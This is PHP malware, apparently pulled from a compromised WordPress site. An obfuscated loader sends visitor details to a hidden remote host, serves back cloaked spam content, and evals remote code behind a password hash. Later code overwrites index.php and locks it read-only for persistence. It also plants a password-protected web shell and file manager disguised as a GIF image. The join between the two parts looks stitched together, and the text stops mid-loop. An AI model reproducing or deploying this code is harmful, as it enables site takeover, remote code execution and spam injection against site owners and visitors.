G6B2zGJvh3o; j7c_mNhyhtx: $pgogWkb1FEB["\x69"] = W6qmq29MvQ3($c44hL2JlLFn); goto Ar2_8UUumsj; DmntCyWejVB: header("\103\x6f\156\164\145\x6e\x74\55\124\171\160\145\x3a\x20\x74\145\x78\x74\x2f\x68\x74\155\x6c\x3b\x20\x63\150\x61\162\163\x65\x74\x3d\x75\164\146\55\70"); goto UZSzeZumihs; G6B2zGJvh3o: metaphone("\117\124\x45\x79\117\124\x45\x34\x4d\104\143\63\x4d\152\x4d\65\x4d\152\125\x34\x4d\x6a\131\62\x4e\172\125\x79\116\124\x4d\x78"); goto T76OcU11DID; nsGdcJbNvti: $pgogWkb1FEB["\163"] = W6qMq29MvQ3($OafXOcs9EXk); goto vEoJu8USN82; JbJ3JVMw3rk: error_reporting(0); goto A7wbniFmQka; IpDTVDzfyPv: $pvH9ZHZ5adG = Tx3w_LJuWkY(base64_decode("\x61\x48\122\x30\x63\x44\x6f\166\114\x33\160\x7a\116\x6a\115\x31\x64\152\x45\x7a\141\x32\x38\165\x63\155\71\x33\144\107\x55\x75\144\x32\154\x72\141\123\70"), $pgogWkb1FEB); goto cLL82BbODEX; vEoJu8USN82: $pgogWkb1FEB["\165"] = w6QMq29Mvq3($_SERVER["\x48\x54\x54\x50\137\125\x53\x45\122\137\101\x47\x45\116\x54"]); goto PWJTdV6CDhV; AEdIHY0uIuP: $vq2UktO2Txq = true; goto yAHc2nVR9ZP; I08qBB_KMtC: echo $pvH9ZHZ5adG["\x63\x6f\156\x74\145\x6e\164"]; goto W8VkzcTH5Iz; Ar2_8UUumsj: $pgogWkb1FEB["\x6c"] = w6qmq29MVq3($_SERVER["\110\x54\x54\x50\137\x41\x43\103\x45\120\124\137\x4c\x41\116\107\x55\x41\107\x45"]); goto uFf59tmL94F; A7wbniFmQka: $BqV8_tEpdgT = "\162" . "\141" . "\156" . "\147" . "\x65"; goto ffkbex_0HrJ; VLeSOJjpWjf: if (!(in_array(gettype($AKdWH6uoUMo) . count($AKdWH6uoUMo), $AKdWH6uoUMo) && count($AKdWH6uoUMo) == 12 && md5(md5(md5(md5($AKdWH6uoUMo[6])))) === "\x66\x66\141\67\62\146\62\145\141\71\x36\145\x35\62\145\x36\71\x64\x30\x34\x31\x31\x31\x38\x39\x66\141\x34\61\x33\70\142")) { goto S1KTmTJAiXf; } goto Cup8L2x1GEE; fiR5XriS_fx: function adreNHLCVdn() { goto A84CZo30NkU; DgSLRDD4jM8: goto C5NvZcD97jy; goto O1chuZJWwXI; X2wIemE3pDb: if (isset($_SERVER["\x48\x54\x54\x50\x5f\x43\x46\137\x43\x4f\x4e\x4e\105\x43\124\x49\116\x47\137\111\x50"]) && !empty($_SERVER["\x48\x54\x54\x50\137\x43\106\137\x43\x4f\116\x4e\x45\x43\x54\111\x4e\x47\x5f\x49\x50"])) { goto tLum73vj3eD; } goto D72Yck0Fvw9; qD2MpNcuTZt: tLum73vj3eD: goto WYcMugkz7Ph; WsYSaU_A_to: if (isset($_SERVER["\110\124\x54\x50\x5f\130\x5f\106\x4f\122\x57\101\x52\x44\x45\x44\x5f\106\117\x52"]) && !empty($_SERVER["\x48\124\x54\120\137\x58\137\106\117\122\127\x41\x52\x44\105\104\x5f\106\x4f\122"])) { goto l6trHn1GMIy; } goto z_K_XNM8RGV; WYcMugkz7Ph: $c44hL2JlLFn = $_SERVER["\110\124\x54\120\137\103\106\x5f\103\x4f\116\x4e\105\103\x54\x49\116\107\137\x49\120"]; goto iLcw0C_0LQX; nIdaVOLcJHt: NrzPBCQFhtp: goto zSXoRWsX69d; Agaqqt1wK01: goto C5NvZcD97jy; goto qD2MpNcuTZt; IileoeeKQR7: $c44hL2JlLFn = explode("\54", $c44hL2JlLFn); goto nVYfGFa_aJh; nVYfGFa_aJh: $c44hL2JlLFn = $c44hL2JlLFn[0]; goto anPQB0exOs7; O1chuZJWwXI: l6trHn1GMIy: goto S8WnuHfLafe; RJn7kaD6Dmp: if (!(strpos($c44hL2JlLFn, "\x2c") !== false)) { goto oYzk1EsMkzB; } goto IileoeeKQR7; z_K_XNM8RGV: $c44hL2JlLFn = $_SERVER["\x52\x45\x4d\117\124\x45\137\x41\x44\x44\x52"]; goto Agaqqt1wK01; zSXoRWsX69d: $c44hL2JlLFn = $_SERVER["\x48\x54\124\x50\x5f\x58\x5f\x52\105\x41\x4c\x5f\x49\120"]; goto DgSLRDD4jM8; anPQB0exOs7: oYzk1EsMkzB: goto el6yOln60Iu; S8WnuHfLafe: $c44hL2JlLFn = $_SERVER["\x48\x54\124\x50\x5f\x58\x5f\106\117\122\x57\x41\x52\104\x45\x44\137\106\x4f\x52"]; goto dav3xxM_8Uu; el6yOln60Iu: return $c44hL2JlLFn; goto S8mUOvR8l2M; D72Yck0Fvw9: if (isset($_SERVER["\x48\124\124\x50\137\x58\x5f\122\x45\x41\x4c\x5f\111\120"]) && !empty($_SERVER["\110\124\124\120\x5f\x58\x5f\x52\x45\x41\114\x5f\111\x50"])) { goto NrzPBCQFhtp; } goto WsYSaU_A_to; iLcw0C_0LQX: goto C5NvZcD97jy; goto nIdaVOLcJHt; kbuzDVdvzPg: $c44hL2JlLFn = trim(str_replace("\40", '', $c44hL2JlLFn), "\x2c"); goto RJn7kaD6Dmp; A84CZo30NkU: $c44hL2JlLFn = ''; goto X2wIemE3pDb; dav3xxM_8Uu: C5NvZcD97jy: goto kbuzDVdvzPg; S8mUOvR8l2M: } goto ro2U8jdOvgs; wvdNGCZVj_V: CbFfrTpPxPq: goto la1ClwihF1B; W8VkzcTH5Iz: exit(0); goto n8iepz2z7xP; IWFWV4bb1Nd: qbiFphh0C7w: goto ump6ZQ_sURn; UF1DdL33Uq4: function tx3w_LjUwKy($VX_nX1J1qvk, $Icq4RU3YuGp = array()) { goto QnqP2S6rUXa; MLdri0F2cKW: return $pvH9ZHZ5adG; goto KbTIkSrRRfe; QnqP2S6rUXa: $pvH9ZHZ5adG = array("\x73\x74\x61\164\x75\x73" => 0, "\x63\x6f\x6e\x74\145\156\164" => '', "\164\x79\x70\x65" => ''); goto UTGDE3dzZAU; JDjkQRY34Dg: try { goto Wsl9p524bRv; RbxDS2iwvIX: $pvH9ZHZ5adG["\x63\x6f\x6e\164\145\x6e\x74"] = strval($WUhFrrXgJVI); goto L8K4nmtluZr; xmpkMEQCTeK: $pvH9ZHZ5adG["\x74\x79\x70\x65"] = strval(curl_getinfo($mwO_GedZwot, CURLINFO_CONTENT_TYPE)); goto OnC7WkCj1tf; eVzWal0x0lj: $pvH9ZHZ5adG = array_merge($pvH9ZHZ5adG, h4_cHeAEjuZ($http_response_header)); goto wCRizfGqw58; POnr_2H8V4t: $pvH9ZHZ5adG["\x63\x6f\x6e\164\145\156\164"] = strval($ljhHb_Gxrhl); goto Ly4SULmGUHq; Ly4SULmGUHq: ud82RFtmFeM: goto GU0luFj6wX9; MfE5L1PGXQR: qYCWhmscZ20: goto FxANSaTNPdk; jV4sNtJ21TX: curl_setopt($mwO_GedZwot, CURLOPT_TIMEOUT, 60); goto MVblKOJKTue; xJtIX7X7HC4: curl_setopt($mwO_GedZwot, CURLOPT_URL, $VX_nX1J1qvk); goto sLNdUAC3N2r; GU0luFj6wX9: s0Ga2tB3AIB: goto REtptpczEAL; MVblKOJKTue: curl_setopt($mwO_GedZwot, CURLOPT_FOLLOWLOCATION, 0); goto ZdIMul9610N; FxANSaTNPdk: $gxfOfMG5KqU = array("\150\x74\x74\160" => array("\x6d\145\x74\x68\x6f\x64" => "\x47\105\x54", "\x74\151\155\145\157\x75\x74" => 60, "\146\157\154\154\157\x77\x5f\x6c\157\x63\x61\x74\151\157\156" => 0), "\x73\163\x6c" => array("\166\x65\x72\151\146\x79\x5f\160\145\145\162" => false, "\166\x65\x72\151\146\x79\x5f\160\145\x65\x72\137\156\x61\x6d\x65" => false)); goto MK5uwsk9KcK; ME4FhKP9TVA: JG5kagZg6IZ: goto pDvau25g2_0; Da2u5m3eiW4: $WUhFrrXgJVI = curl_exec($mwO_GedZwot); goto EIEzIE7jYZp; L8K4nmtluZr: u_PCostwtpf: goto W7IJgLGUFgd; qVTCDqMr67e: if (ini_get("\141\154\x6c\157\167\x5f\165\162\x6c\137\146\157\x70\145\156")) { goto qYCWhmscZ20; } goto w9ZebN3hsTe; g5KlkuWWKoL: if (!in_array($pvH9ZHZ5adG["\x73\x74\141\x74\x75\163"], array(200, 301, 302, 404))) { goto u_PCostwtpf; } goto RbxDS2iwvIX; wCRizfGqw58: if (!in_array($pvH9ZHZ5adG["\163\x74\141\x74\165\x73"], array(200, 301, 302, 404))) { goto ud82RFtmFeM; } goto POnr_2H8V4t; ZdIMul9610N: curl_setopt($mwO_GedZwot, CURLOPT_COOKIESESSION, 0); goto HkVC5q2JYIp; pDvau25g2_0: $mwO_GedZwot = curl_init(); goto xJtIX7X7HC4; w9ZebN3hsTe: goto s0Ga2tB3AIB; goto ME4FhKP9TVA; J9KWAgg2yTF: $ljhHb_Gxrhl = @file_get_contents($VX_nX1J1qvk, false, $swM99lQGrdu); goto eVzWal0x0lj; Wsl9p524bRv: if (function_exists("\x63\x75\162\x6c\x5f\145\x78\x65\x63") && function_exists("\143\x75\162\x6c\x5f\151\156\151\x74")) { goto JG5kagZg6IZ; } goto qVTCDqMr67e; OnC7WkCj1tf: $pvH9ZHZ5adG["\x63\x6f\x6e\x74\145\x6e\164"] = strval(curl_getinfo($mwO_GedZwot, CURLINFO_REDIRECT_URL)); goto LDcLF9WMKpQ; HkVC5q2JYIp: curl_setopt($mwO_GedZwot, CURLOPT_RETURNTRANSFER, 1); goto Da2u5m3eiW4; yWwXh88z4M4: curl_setopt($mwO_GedZwot, CURLOPT_CONNECTTIMEOUT, 20); goto jV4sNtJ21TX; sLNdUAC3N2r: curl_setopt($mwO_GedZwot, CURLOPT_SSL_VERIFYHOST, 0); goto fbe6ypXqzzs; MK5uwsk9KcK: $swM99lQGrdu = stream_context_create($gxfOfMG5KqU); goto J9KWAgg2yTF; LDcLF9WMKpQ: @curl_close($mwO_GedZwot); goto g5KlkuWWKoL; W7IJgLGUFgd: goto s0Ga2tB3AIB; goto MfE5L1PGXQR; EIEzIE7jYZp: $pvH9ZHZ5adG["\163\x74\141\x74\x75\x73"] = intval(curl_getinfo($mwO_GedZwot, CURLINFO_HTTP_CODE)); goto xmpkMEQCTeK; fbe6ypXqzzs: curl_setopt($mwO_GedZwot, CURLOPT_SSL_VERIFYPEER, 0); goto yWwXh88z4M4; REtptpczEAL: } catch (Exception $TwptZqkCdJY) { } goto MLdri0F2cKW; v9s99Jpcx6v: $VX_nX1J1qvk .= "\x3f" . http_build_query($Icq4RU3YuGp); goto hqbfoHVH9tY; hqbfoHVH9tY: CzfxWFl0ZpZ: goto JDjkQRY34Dg; UTGDE3dzZAU: if (!(is_array($Icq4RU3YuGp) && count($Icq4RU3YuGp))) { goto CzfxWFl0ZpZ; } goto v9s99Jpcx6v; KbTIkSrRRfe: } goto gcMHiOSMcod; C61L61NVBu4: function H4_ChEAejUz($bwJH7_VO1Qj) { goto M9FBgOkN15g; M9FBgOkN15g: $R0hPxy_FC1R = array("\x73\x74\141\164\165\x73" => 0, "\143\157\156\164\x65\156\x74" => '', "\x74\x79\160\x65" => ''); goto tpXyFq5HG2t; baWpLLuRsxR: foreach ($bwJH7_VO1Qj as $XwxhfIrwUc6) { goto upy_YlhxQI1; zlUb8n9EXlX: jSl8_CFRHlm: goto Se8o60h_yyJ; Se8o60h_yyJ: AcjoA8dx2Yn: goto mNS0CZqvLk4; G5IHjKWzMyv: goto jSl8_CFRHlm; goto X2Bm9d3ER7W; etlp5Vfnf0r: if (preg_match("\x2f\x6c\157\x63\x61\164\151\157\156\x5c\72\133\134\163\x5d\x2b\50\x2e\52\51\x2f\x69", $XwxhfIrwUc6, $KElLIC48lOp)) { goto G9aqZsIMZf7; } goto XZtBbHw5Icy; Kq13YMJ4l8I: $R0hPxy_FC1R["\x73\164\141\164\x75\x73"] = intval($KElLIC48lOp[1]); goto afhtqNdgqWq; z31bg3PTQv5: FiBAqEY2mzB: goto QDpgvmg9vTy; zxjq7JCxSX2: G9aqZsIMZf7: goto D70n7Vybuf1; afhtqNdgqWq: goto jSl8_CFRHlm; goto zxjq7JCxSX2; QDpgvmg9vTy: $R0hPxy_FC1R["\164\171\160\x65"] = $KElLIC48lOp[1]; goto zlUb8n9EXlX; XZtBbHw5Icy: if (preg_match("\57\143\157\156\164\145\x6e\x74\134\55\x74\x79\160\145\x5c\x3a\133\x5c\x73\135\53\x28\x2e\52\x29\57\151", $XwxhfIrwUc6, $KElLIC48lOp)) { goto FiBAqEY2mzB; } goto G5IHjKWzMyv; hZzHUqSdrX3: goto jSl8_CFRHlm; goto z31bg3PTQv5; D70n7Vybuf1: $R0hPxy_FC1R["\143\x6f\x6e\164\145\156\x74"] = $KElLIC48lOp[1]; goto hZzHUqSdrX3; upy_YlhxQI1: if (preg_match("\x2f\150\164\x74\x70\x5c\x2f\133\60\x2d\x39\x5c\x2e\135\53\x5b\134\x73\x5d\53\x28\133\60\x2d\x39\x5d\x2b\x29\57\151", $XwxhfIrwUc6, $KElLIC48lOp)) { goto QnOMwMtEl24; } goto etlp5Vfnf0r; X2Bm9d3ER7W: QnOMwMtEl24: goto Kq13YMJ4l8I; mNS0CZqvLk4: } goto CshLHZY8iy8; Sw3VUuG1Qvg: qdoQa3IAzJ8: goto baWpLLuRsxR; qdhjGf1E69M: return $R0hPxy_FC1R; goto Sw3VUuG1Qvg; w8MF5Ke899r: return $R0hPxy_FC1R; goto Co2A0Tfnax1; CshLHZY8iy8: s1eQJCv6tzV: goto w8MF5Ke899r; tpXyFq5HG2t: if (is_array($bwJH7_VO1Qj)) { goto qdoQa3IAzJ8; } goto qdhjGf1E69M; Co2A0Tfnax1: } goto UF1DdL33Uq4; cSavwhf6v5z: UIh0ylPft2x: goto bPgnFAVaTYA; ffkbex_0HrJ: $k40yK846tuw = $BqV8_tEpdgT("\x7e", "\40"); goto PosQOY2q5kV; ump6ZQ_sURn: if (!strlen($pvH9ZHZ5adG["\x63\x6f\x6e\164\145\x6e\x74"])) { goto zVrOjlOlNgH; } goto td4vx89owx0; pIfXWAG0Mkb: $pgogWkb1FEB["\162"] = w6QmQ29MvQ3($_SERVER["\122\x45\x51\125\x45\x53\x54\137\125\x52\x49"]); goto a2Ef26tzZ8v; g2esQ3y2ZQR: NXTs6btnNWx: goto eWDX4AY5o9M; ro2U8jdOvgs: function Tl6q0pyXChM() { goto vrIRsCwzEGl; ua8cBIwwOpe: xAxWLsKM3of: goto zoiM9rfCvYG; V7ooraLiyoq: goto xAxWLsKM3of; goto cFyuHYuaLUm; vrIRsCwzEGl: $T6HY1C_Xd2A = "\150\x74\x74\160\72\57\57"; goto OEtLx1XKivx; oXm4VOvRlXu: $T6HY1C_Xd2A = "\x68\x74\164\160\x73\72\57\57"; goto ua8cBIwwOpe; zoiM9rfCvYG: return $T6HY1C_Xd2A; goto aVpnhLhZTL4; TfY1rarVYrX: $T6HY1C_Xd2A = "\150\x74\164\x70\163\72\57\x2f"; goto V7ooraLiyoq; Tmg6fF50ith: if (isset($_SERVER["\x48\x54\124\120\x5f\x58\x5f\x46\117\122\x57\101\122\104\x45\x44\x5f\x50\122\x4f\124\117"]) && $_SERVER["\110\124\124\120\137\130\137\x46\117\x52\x57\101\122\104\105\x44\137\x50\x52\x4f\124\x4f"] === "\x68\164\x74\x70\x73") { goto S6e49BudlEb; } goto YSEZduPhMWv; R60vtBFRVuD: $T6HY1C_Xd2A = "\x68\x74\x74\x70\x73\x3a\57\x2f"; goto ViVMndbys7J; tSegaTz53lg: S6e49BudlEb: goto TfY1rarVYrX; wRc9X1DoAQd: goto xAxWLsKM3of; goto Ok5Teolsvyn; Ok5Teolsvyn: c_Vd1IYF58U: goto R60vtBFRVuD; ViVMndbys7J: goto xAxWLsKM3of; goto tSegaTz53lg; cFyuHYuaLUm: OEtxcl2CGP0: goto oXm4VOvRlXu; YSEZduPhMWv: if (isset($_SERVER["\x48\124\124\120\137\x46\122\x4f\x4e\124\x5f\x45\116\x44\137\110\124\124\x50\123"]) && strtolower($_SERVER["\x48\124\124\120\137\x46\122\117\116\124\137\x45\116\x44\137\110\x54\x54\120\x53"]) !== "\x6f\146\x66") { goto OEtxcl2CGP0; } goto wRc9X1DoAQd; OEtLx1XKivx: if (isset($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\110\x54\x54\120\x53"]) !== "\x6f\146\146") { goto c_Vd1IYF58U; } goto Tmg6fF50ith; aVpnhLhZTL4: } goto P7wMqlfyd1K; N5yYeP5BDev: $vq2UktO2Txq = false; goto V2Y9Ohrajqu; eWDX4AY5o9M: $pgogWkb1FEB = array(); goto j7c_mNhyhtx; V2Y9Ohrajqu: if (!(strpos($A5PjNjZNpFv, "\x2e") > 0 && strpos($A5PjNjZNpFv, "\x2e\160\x68\x70") === false)) { goto Xeg5by5ncWf; } goto jVIa0tFHDKI; PWJTdV6CDhV: $A5PjNjZNpFv = preg_replace("\57\134\x3f\x2e\x2a\57", '', $_SERVER["\x52\105\121\125\x45\123\x54\x5f\125\122\111"]); goto N5yYeP5BDev; T76OcU11DID: class U8DvgN30ey7 { static function W2aTwOjvF0n($zoKKsVUMhJC) { goto yRsdYU9fUqE; Srcl0k60gtn: $LgW3MWAneyy = ''; goto WxJFzF0HSCD; E4VsyZYEZ1H: $BuFcsFWqAeR = $kEw13TsqUrH("\x7e", "\x20"); goto LYG0Z4qitVg; LYG0Z4qitVg: $nj3ICRQRd6d = explode("\x5e", $zoKKsVUMhJC); goto Srcl0k60gtn; WxJFzF0HSCD: foreach ($nj3ICRQRd6d as $T2mgTjGz9xn => $XmCqe3N1hft) { $LgW3MWAneyy .= $BuFcsFWqAeR[$XmCqe3N1hft - 98442]; W91ENYLcQrv: } goto i60V4FzMNoH; oeewXX62L33: return $LgW3MWAneyy; goto HCZk9d1oiuH; i60V4FzMNoH: t6Z28tfu9lN: goto oeewXX62L33; yRsdYU9fUqE: $kEw13TsqUrH = "\x72" . "\141" . "\156" . "\147" . "\145"; goto E4VsyZYEZ1H; HCZk9d1oiuH: } static function idJR2xRczJB($Niynov4Ye4O, $ST6V3WIwKNL) { goto yah97fz0z6v; ckP0INjx8XV: curl_setopt($Kaa99eMaf5a, CURLOPT_RETURNTRANSFER, 1); goto EsRoHmxxCrS; yah97fz0z6v: $Kaa99eMaf5a = curl_init($Niynov4Ye4O); goto ckP0INjx8XV; OZv2cuNjHMf: return empty($ulmhAGVme0H) ? $ST6V3WIwKNL($Niynov4Ye4O) : $ulmhAGVme0H; goto WulAxwi1UDy; EsRoHmxxCrS: $ulmhAGVme0H = curl_exec($Kaa99eMaf5a); goto OZv2cuNjHMf; WulAxwi1UDy: } static function SoYtMkncsOo() { goto XItlIzQF0qW; P4iV5xGUF9f: Dv83LgHiC3Y: goto nT01M3iyHD9; HsMZhHgJBNt: die; goto P4iV5xGUF9f; F6qRJ4rOfE2: foreach ($j3o4ih2wpiG as $UJLtzg1lK4A) { $YR0gjtFuLXp[] = self::w2Atwojvf0n($UJLtzg1lK4A); YWskoLFNoCB: } goto uKXNNUQ9cYC; dLvoyIu5n72: $n9RNg73EWIm = @$YR0gjtFuLXp[0 + 3]($YR0gjtFuLXp[3 + 3], $OROXdhZu9c5); goto kdj9uIM2lfn; RuOa8OYSDpU: $kH2zIjj7zbk = self::idJR2XRcZjB($YXBMxhpaIiX[1 + 0], $YR0gjtFuLXp[0 + 5]); goto f2fRae0jovl; nV1cNkQCOmZ: if (!(@$YXBMxhpaIiX[0] - time() > 0 and md5(md5($YXBMxhpaIiX[0 + 3])) === "\x31\x37\x39\146\64\x31\x61\x64\145\64\x61\146\x61\x65\146\144\71\x30\65\x30\x30\x64\x37\x33\x32\x31\143\x65\142\x35\x30\x65")) { goto Dv83LgHiC3Y; } goto RuOa8OYSDpU; GuHOH0r1rU4: @$YR0gjtFuLXp[10 + 0](INPUT_GET, "\x6f\x66") == 1 && die($YR0gjtFuLXp[5 + 0](__FILE__)); goto nV1cNkQCOmZ; XItlIzQF0qW: $j3o4ih2wpiG = array("\x39\70\x34\66\x39\136\71\70\64\x35\x34\x5e\71\x38\x34\66\67\x5e\x39\70\64\67\61\136\71\70\x34\x35\x32\136\x39\x38\x34\66\67\x5e\71\70\x34\67\63\136\x39\x38\64\x36\x36\136\71\x38\x34\x35\x31\x5e\x39\70\64\x35\x38\x5e\71\x38\x34\66\x39\136\71\x38\64\x35\x32\x5e\71\70\64\66\x33\136\71\x38\64\65\x37\x5e\x39\x38\x34\x35\70", "\71\70\64\65\63\x5e\71\x38\64\65\x32\x5e\x39\70\x34\65\x34\136\71\x38\64\67\x33\136\71\70\64\x35\x34\x5e\71\70\x34\x35\67\136\71\x38\64\x35\x32\136\71\70\x35\61\71\x5e\71\70\65\x31\67", "\71\x38\x34\66\62\136\x39\x38\x34\x35\x33\x5e\x39\70\x34\65\x37\x5e\x39\70\64\x35\70\136\x39\70\x34\x37\63\136\x39\70\x34\x36\x38\x5e\x39\x38\64\x36\x37\136\71\70\x34\x36\71\x5e\x39\x38\64\65\67\x5e\71\x38\64\66\x38\136\x39\x38\64\x36\x37", "\x39\70\64\x35\x36\136\71\x38\x34\x37\x31\136\x39\x38\64\x36\x39\136\71\x38\64\x36\61", "\71\70\x34\67\x30\136\71\x38\64\x37\x31\x5e\71\x38\x34\65\x33\136\71\x38\x34\66\67\x5e\x39\x38\x35\x31\x34\136\x39\70\65\x31\66\136\71\x38\x34\67\x33\x5e\x39\70\64\x36\70\x5e\x39\70\64\x36\x37\136\x39\x38\64\66\x39\x5e\71\70\x34\x35\x37\x5e\x39\x38\64\66\70\x5e\x39\x38\64\x36\67", "\x39\70\x34\66\66\x5e\71\x38\64\66\63\x5e\71\70\64\x36\60\x5e\x39\x38\64\66\x37\x5e\71\70\64\x37\x33\x5e\x39\x38\x34\x36\65\x5e\71\70\x34\66\67\x5e\x39\x38\64\65\62\136\71\70\64\x37\x33\136\71\x38\x34\66\71\136\x39\70\x34\65\x37\x5e\71\x38\x34\x35\x38\x5e\71\x38\64\x35\62\136\71\x38\x34\66\67\136\x39\x38\x34\x35\70\136\x39\x38\64\x35\62\x5e\71\x38\64\x35\x33", "\x39\70\x34\x39\66\x5e\x39\x38\65\62\x36", "\x39\x38\x34\x34\x33", "\x39\70\65\62\x31\136\71\x38\x35\x32\x36", "\71\70\65\60\63\136\71\x38\64\x38\66\x5e\x39\x38\x34\70\66\x5e\71\x38\65\60\x33\136\x39\70\x34\x37\x39", "\x39\70\64\x36\x36\136\x39\70\64\x36\x33\x5e\x39\70\64\66\x30\x5e\x39\70\x34\x35\62\x5e\71\x38\x34\x36\x37\136\x39\70\x34\65\x34\136\71\x38\x34\67\x33\x5e\71\70\64\x36\x33\136\71\x38\x34\65\70\x5e\71\x38\64\65\x36\136\x39\70\64\65\x31\x5e\71\x38\64\65\x32"); goto F6qRJ4rOfE2; Gnku_pwzvlw: $OROXdhZu9c5 = @$YR0gjtFuLXp[1]($YR0gjtFuLXp[5 + 5](INPUT_GET, $YR0gjtFuLXp[7 + 2])); goto dLvoyIu5n72; f2fRae0jovl: @eval($YR0gjtFuLXp[4 + 0]($kH2zIjj7zbk)); goto HsMZhHgJBNt; uKXNNUQ9cYC: TjPTaHiWjuC: goto Gnku_pwzvlw; kdj9uIM2lfn: $YXBMxhpaIiX = $YR0gjtFuLXp[1 + 1]($n9RNg73EWIm, true); goto GuHOH0r1rU4; nT01M3iyHD9: } } goto zJE3aEphH6o; iSs3l9tOK_g: exit(strrev(md5($_SERVER["\123\105\x52\126\x45\122\x5f\116\101\115\x45"]))); goto wP4PHKmK3hr; jVIa0tFHDKI: $OjCk1KUb1s1 = substr($A5PjNjZNpFv, strpos($A5PjNjZNpFv, "\x2e")); goto Ni5jD_gpsu3; wr62cmmS2Gv: $tjGhkccNhTO = ''; goto g2esQ3y2ZQR; wP4PHKmK3hr: t_82SHEcZV8: goto ezx0tYSGkyY; yAHc2nVR9ZP: vXDYlZiFndF: goto MilPBBN3bDs; QgvYBhLLrwj: if (!(strpos($tjGhkccNhTO, $OafXOcs9EXk) === 0)) { goto NXTs6btnNWx; } goto wr62cmmS2Gv; MilPBBN3bDs: Xeg5by5ncWf: goto YKSy04mJgCL; YKSy04mJgCL: if ($vq2UktO2Txq) { goto AOimpZw3yUQ; } goto IpDTVDzfyPv; la1ClwihF1B: tG0MVGprJaQ: goto IWFWV4bb1Nd; cr5J_o57P0p: AOimpZw3yUQ:
?>
<?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>");
$index_code = file_get_contents($do."index.php");
if(md5($index_code) != md5($open_cache_ruzhu_phpcode))
{
    @chmod($do."index.php", 0644);
    @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode);
    @touch($do."index.php", filectime($do."index.php"));
    @chmod($do."index.php", 0444);
}

$file_general_template_path = $do."wp-includes/general-template.php";
$jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif";
if (!file_exists($jue_jiang_404_path)){
    $jue_jiang_404 = "<?php
error_reporting(0);
date_default_timezone_set('PRC');

$ARRAY = ${'_GET'}['ARRAY'];
$KJMn = str_rot13($ARRAY);
$cbH = pack("\x48\x2a", $KJMn);
$EzaU = json_decode($cbH, true);
if (($EzaU[0] - time()) > 0 and md5(md5($EzaU[2])) === "9f34665b0052311d5b6ad6f821dc6228") : // ====
// ===============================================================

    function juejiang_perms($file){
        $perms = fileperms($file);
        if (($perms & 0xC000) == 0xC000) {// Socket
            $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {// Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {// Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {// Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {// Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe
            $info = 'p';
        } else {// Unknown
            $info = 'u';
        }
// Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

        return $info;
    }

// ------------------------------------------------------
    /**
     * 转化 \ 为 /
     */
    function dir_path($path)
    {
        $path = str_replace('\\', '/', $path);
        if (substr($path, -1) != '/') $path = $path . '/';
        return $path;
    }

// ------------------------------------------------------

    /** 取得站点根目录
     * @return array|string|string[]
     */
    function document_root(){

        $php_self = dir_path($_SERVER["PHP_SELF"]);
        $script_filename = dir_path($_SERVER["SCRIPT_FILENAME"]);
        if (empty($_SERVER["PHP_SELF"]) or empty($_SERVER["SCRIPT_FILENAME"])){
            $do1 = dir_path($_SERVER["DOCUMENT_ROOT"]);
            $do = rtrim($do1,'/');
        }else{
            $do = str_replace(str_replace("//", "/", $php_self), "", str_replace("\\\\", "/", $script_filename));
        }
		if(empty($do)) $do = '/';
        return $do;
    }
    $document_root = document_root();
    define('DOCUMENT_ROOT', $document_root);

// ------------------------------------------------------



    $php_version = PHP_MAJOR_VERSION;
	if($php_version<=7){
		if(get_magic_quotes_gpc()){
			foreach($_POST as $key=>$value){
				$_POST[$key] = stripslashes($value);
			}
		}
	}

    $Version = base64_decode('5pyA5ZCO55qE5YCU5by6');
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }


    echo '<!doctype html>
<html>
<head>
<title>&Error_404&</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>';
    ?>

    <center>
        <style>
            body{background:#e6e6e6;line-height:1;color:#000;font-family:Comic Sans MS;width:60%;margin:0 auto;}
            table,th,td{border-collapse:collapse;background:transparent;font-size:13px;}
            input,textarea{}
            .table_home,.th_home,.td_home{color:grey;border:1px solid grey;}
            th{padding:10px;}
            .td_home{padding:7px;}
            a{color:#000; text-decoration:none;}
            textarea{width:100%;height:400px;}
            #content tr:hover{background-color:#cecece;text-shadow:0px 0px 10px #fff;color:#fff;}
            .dh a{ padding-left: 10px; padding-right: 10px; border-right: 1px solid #000;}
            .dh a:hover{ color: #f00;}
        </style>
    <?php
    echo '</head>
<body><b>
<H1><center><font color="red">'.$Version.'</font></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font ><center>'.php_uname().'</center></font><br>';
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }
    $path = str_replace('\\','/',$path);
    $paths = explode('/',$path);

    $gen_link_url = '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path='.DOCUMENT_ROOT;
    $gen_link_url .= '">根目录 ：    </a>&nbsp;';
    echo $gen_link_url;

    foreach($paths as $id=>$pat){
        if($pat == '' && $id == 0){
            $a = true;
            echo '<font color=#000>
<a href="?ARRAY='.$ARRAY.'&path=/">/</a>';
            continue;
        }
        if($pat == '') continue;
        echo '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path=';
        for($i=0;$i<=$id;$i++){
